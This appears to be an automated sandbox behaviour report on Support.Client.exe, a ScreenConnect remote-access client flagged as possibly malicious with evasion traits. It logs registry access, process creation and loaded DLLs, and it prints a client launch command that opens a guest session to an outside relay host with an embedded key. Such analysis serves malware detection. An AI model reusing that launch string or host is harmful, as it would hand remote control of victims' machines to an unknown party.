                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: Support.Client.exePE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C0A4950_2_00C0A495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B88AF4F1_2_00007FFD9B88AF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8933A11_2_00007FFD9B8933A1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B89A1AF1_2_00007FFD9B89A1AF
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8AB1351_2_00007FFD9B8AB135
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8927481_2_00007FFD9B892748
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B89D5991_2_00007FFD9B89D599
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B88F8911_2_00007FFD9B88F891
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8812111_2_00007FFD9B881211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A30F11_2_00007FFD9B8A30F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8861381_2_00007FFD9B886138
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A27681_2_00007FFD9B8A2768
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8870BD12_2_00007FFD9B8870BD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8810CF12_2_00007FFD9B8810CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8810D712_2_00007FFD9B8810D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB969FB12_2_00007FFD9BB969FB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB958F112_2_00007FFD9BB958F1
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568
                  Source: Support.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal57.evad.winEXE@17/74@2/2
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00C01000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7568
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\Support.Client.exeCommand line argument: dfshim0_2_00C01000
                  Source: Support.Client.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Support.Client.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: Support.Client.exeVirustotal: Detection: 20%
                  Source: unknownProcess created: C:\Users\user\Desktop\Support.Client.exe "C:\Users\user\Desktop\Support.Client.exe"
                  Source: C:\Users\user\Desktop\Support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568
                  Source: C:\Users\user\Desktop\Support.Client.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe" "RunRole" "f96fdd58-b31b-40b0-b300-0e1ead05a7df" "User"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: dfshim.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: version.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Support.Client.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
